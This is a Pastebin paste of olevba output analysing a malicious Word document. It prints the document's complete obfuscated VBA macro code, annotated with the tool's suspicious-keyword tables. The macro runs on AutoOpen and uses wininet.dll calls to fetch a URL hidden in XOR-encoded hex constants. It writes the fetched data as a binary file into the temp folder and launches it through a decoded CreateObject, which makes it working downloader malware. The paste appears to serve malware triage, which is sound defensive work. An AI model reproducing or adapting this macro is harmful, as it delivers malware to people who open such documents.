Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- 204-23~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: 204-23~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: 204-23~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub RAMIRO(FELIX As Long)
- BRADY
- End Sub
- Sub autoopen()
- RAMIRO (124)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO PERCY.bas
- in file: 204-23~1.doc - OLE stream: u'Macros/VBA/PERCY'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function MICKEY Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef DYLAN As LongPtr) As Long
- Public Declare PtrSafe Function CHASE Lib "wininet.dll" Alias "InternetOpenA" (ByVal MOISES As String, ByVal DAMIAN As Long, ByVal REUBEN As String, ByVal DESMONDTOPHER As String, ByVal DANIEL As Long) As LongPtr
- Public Declare PtrSafe Function MARCEL Lib "wininet.dll" Alias "InternetReadFile" (ByVal AUGUST As LongPtr, ByVal DARIUS As String, ByVal DONALD As Long, GEORGE As Long) As Integer
- Public Declare PtrSafe Function CLEVELAND Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal AGUSTINN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr
- #End If
- Public Function RICARDO(ByRef OLIVER As Object, ByRef HUGO As String, RUBEN As Double) As Boolean
- Set TOMAS = CreateObject _
- (MURRAY _
- (ESTEBAN, BUDDY))
- Dim BRETT As Integer
- BRETT = TOMAS.Open(OLIVER & HUGO)
- End Function
- Public Function GILBERTO(ByRef MONTE As String, ByRef DARWIN As Long) As Integer
- GILBERTO = Asc(WOODROW(44, MONTE, _
- ((DARWIN Mod SALVATORE(MONTE)) + 1), 1))
- End Function
- Public Function LIONEL(FREDDIE As Long, TERRENCE As String, ENRIQUE As String) As String
- FREDDIE = FREDDIE * 2
- LIONEL = MURRAY(TERRENCE, ENRIQUE)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Open | May open a file |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO CLAY.bas
- in file: 204-23~1.doc - OLE stream: u'Macros/VBA/CLAY'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function MURRAY(MONTE As String, ELLIOT As String) As String
- Dim JOAQUIN As Integer
- Dim HARLAN As Integer
- Dim DARREL As Integer
- DARREL = 351
- If DARREL > DARREL * 3 Then End
- Dim DARWIN As Long
- Dim AGUSTIN As String
- For DARWIN = 1 To (SALVATORE(ELLIOT) / 2)
- JOAQUIN = DESMOND(ELLIOT, DARWIN)
- HARLAN = GILBERTO(MONTE, DARWIN)
- AGUSTIN = AGUSTIN + DAMIEN(JOAQUIN, HARLAN)
- Next DARWIN
- MURRAY = AGUSTIN
- End Function
- Public Sub BRADY()
- Dim BERT As Double
- Dim BURTON As Integer
- For BURTON = 4 To 54
- BURTON = BURTON + 30
- Next BURTON
- DOMINGO (4.43)
- End Sub
- Public Function SCOTTY(SANTIAGO As String)
- Dim ALONZO As String
- ALONZO = "JAMAL"
- ELIAS 33 + 0.2
- ALONZO = ALONZO + "DEVON"
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO ROLANDO.bas
- in file: 204-23~1.doc - OLE stream: u'Macros/VBA/ROLANDO'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function NOLAN(CAREY As Long, ByVal QUINTON As String) As Boolean
- #If VBA7 And Win64 Then
- Dim BRAIN As LongPtr, ELWOOD As LongPtr
- #Else
- Dim BRAIN As Long, ELWOOD As Long
- #End If
- Dim KENDRICK As Long
- Dim DARIUS As String * ELLIOTT, MOISES As String
- Dim RAPHAEL As Integer, FIDEL As Double
- BRAIN = EFRAIN
- If BRAIN = 0 Then
- Exit Function
- End If
- Dim THADDEUS As Boolean
- If CLIFF(ELWOOD, BRAIN) Then
- End If
- If ELWOOD = 0 Then
- FIDEL = 0
- Else
- MARCEL ELWOOD, DARIUS, ELLIOTT, KENDRICK
- MOISES = DARIUS
- Dim JACKSON As Integer
- JACKSON = 0
- JACKSON = JACKSON + 33
- If JACKSON > JACKSON + 40 Then End
- Do While KENDRICK <> 0
- MARCEL ELWOOD, DARIUS, ELLIOTT, KENDRICK
- MOISES = MOISES + Mid(DARIUS, 1, KENDRICK)
- Loop
- FIDEL = SALVATORE(MOISES): _
- RAPHAEL = LOWELL("JERRY")
- Open QUINTON _
- For Binary Access Write _
- Lock Write As #RAPHAEL
- Put #RAPHAEL, , MOISES
- JACKSON = JACKSON + 62
- If JACKSON < 0 Then End
- Close #RAPHAEL
- End If
- MICKEY ELWOOD
- MICKEY BRAIN
- MOISES = ""
- If FIDEL Then
- NOLAN = True
- End If
- End Function
- Public Function SALVATORE(KRISTOPHER As String) As Long
- SALVATORE = Len(KRISTOPHER)
- End Function
- Public Function ELIAS(ERNESTO As Double)
- Dim LIONEL As Object
- Dim ROMAN As Long
- For ROMAN = 14 To 15
- ROMAN = ROMAN + 15
- Next ROMAN
- Dim ELLIS As Object
- For ROMAN = 10 To 20
- ROMAN = ROMAN + 60
- Next ROMAN
- Set ELLIS = LAURENCE
- ROMAN = ROMAN + 5
- Dim LEWIS As Boolean
- If ROMAN > ROMAN * 100 Then End
- LEWIS = ORVILLE(LIONEL, ELLIS)
- ERNESTO = ERNESTO + 4
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- +------------+---------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO CORNELIUS.bas
- in file: 204-23~1.doc - OLE stream: u'Macros/VBA/CORNELIUS'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- Public Const BUDDY = "1F3E2C223B670D3C392D24305231253927"
- Public Const XAVIER = "1026202B253B297F67243536"
- Public Const KERMIT = "24223D3E6D66633D3C23287D502A623F2561637B637F7A7463364B20"
- Public Const ROSCOE = "1F353B27273D25222E6F0B3A5F201F2F3A3A3224032E23242E27"
- Public Const ESTEBAN = "ELVINWILLIAMS3"
- Public Const ELLIOTT = 5555
- Public Const WILFREDO As String = "BART"
- Public Const JARROD = 1
- Public Const VANCE = &H4000000
- Sub DOMINGO(SANTOS As Double)
- SCOTTY ("ANTONSOLOMON")
- End Sub
- Public Function DAMIEN(ByRef JOAQUIN As Integer, ByRef HARLAN As Integer) As String
- DAMIEN = Chr(JOAQUIN Xor HARLAN)
- End Function
- Public Function DESMOND(ByRef ELLIOT As String, ByRef DARWIN As Long) As Integer
- DESMOND = Val("&H" & (WOODROW(12, ELLIOT, ASHLEY(DARWIN), 2)))
- End Function
- Public Function ASHLEY(ByRef DARWIN As Long) As Long
- ASHLEY = (2 * DARWIN) - 1
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO LAMAR.bas
- in file: 204-23~1.doc - OLE stream: u'Macros/VBA/LAMAR'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const JASPER = "RUSSEL"
- #If VBA7 And Win64 Then
- #Else
- Public Declare Function MICKEY Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef DYLAN As Long) As Long
- Public Declare Function CHASE Lib "wininet.dll" Alias "InternetOpenA" (ByVal MOISES As String, ByVal DAMIAN As Long, ByVal REUBEN As String, ByVal DESMONDTOPHER As String, ByVal DANIEL As Long) As Long
- Public Declare Function MARCEL Lib "wininet.dll" Alias "InternetReadFile" (ByVal AUGUST As Long, ByVal DARIUS As String, ByVal DONALD As Long, GEORGE As Long) As Integer
- Public Declare Function CLEVELAND Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal AGUSTINN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long
- #End If
- Public Function WOODROW(SAMMY As Long, ByRef KRISTOPHER As String, ByRef JOAQUIN As Integer, ByRef HARLAN As Integer) As String
- WOODROW = Mid$(KRISTOPHER, JOAQUIN, HARLAN)
- SAMMY = SAMMY + 31
- End Function
- #If VBA7 _
- And Win64 Then
- Public Function EFRAIN() As LongPtr
- #Else
- Public Function EFRAIN() As Long
- #End If
- EFRAIN = CHASE(WILFREDO, JARROD, vbNullString, vbNullString, 0)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO DEXTER.bas
- in file: 204-23~1.doc - OLE stream: u'Macros/VBA/DEXTER'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function LAURENCE() As Object
- Dim ISMAEL As String
- ISMAEL = MURRAY(ESTEBAN, ROSCOE)
- Set LAURENCE = CreateObject(ISMAEL)
- End Function
- #If VBA7 And Win64 Then
- Public Function CLIFF(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
- #Else
- Public Function CLIFF(ByRef GRADY As Long, NOAH As Long) As Boolean
- #End If
- Dim PHIL As Double
- Dim GUADALUPE As String
- Dim CLARK As Long
- GUADALUPE = LIONEL(893, ESTEBAN, KERMIT)
- For PHIL = 14 To 15
- PHIL = PHIL + 5.5
- Next PHIL
- GRADY = CLEVELAND(NOAH, GUADALUPE, vbNullString, 0, VANCE, 0)
- CLIFF = True
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+--------------------------+
- | Type | Keyword | Description |
- +------------+--------------+--------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- +------------+--------------+--------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO AMOS.bas
- in file: 204-23~1.doc - OLE stream: u'Macros/VBA/AMOS'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function ORVILLE(ByRef OLIVER As Object, ByRef HOMER As Object) As Boolean
- Dim HARRISON As Long
- Set OLIVER = IGNACIO(LAURENCE)
- Dim ADOLFO
- Dim HUGO As String
- HUGO = LIONEL(4096, ESTEBAN, XAVIER)
- For HARRISON = 2 To 5
- HARRISON = HARRISON * 12
- Next HARRISON
- ADOLFO = OLIVER & HUGO
- If WILFRED(HOMER, ADOLFO) Then
- End If
- If NOLAN(559, ADOLFO) Then
- End If
- If WILFRED(HOMER, ADOLFO) Then
- End If
- ORVILLE = RICARDO(OLIVER, HUGO, 22)
- End Function
- Public Function WILFRED(ByRef JERMAINE As Object, ByVal FORREST As String) As Boolean
- If JERMAINE.FileExists(FORREST) Then
- WILFRED = True
- Else
- WILFRED = False
- End If
- End Function
- Public Function LOWELL(KRISTOPHER As String) As Integer
- LOWELL = FreeFile
- End Function
- Public Function IGNACIO(ByRef NICHOLAS As Object) As Object
- Set IGNACIO = NICHOLAS.GetSpecialFolder(2)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement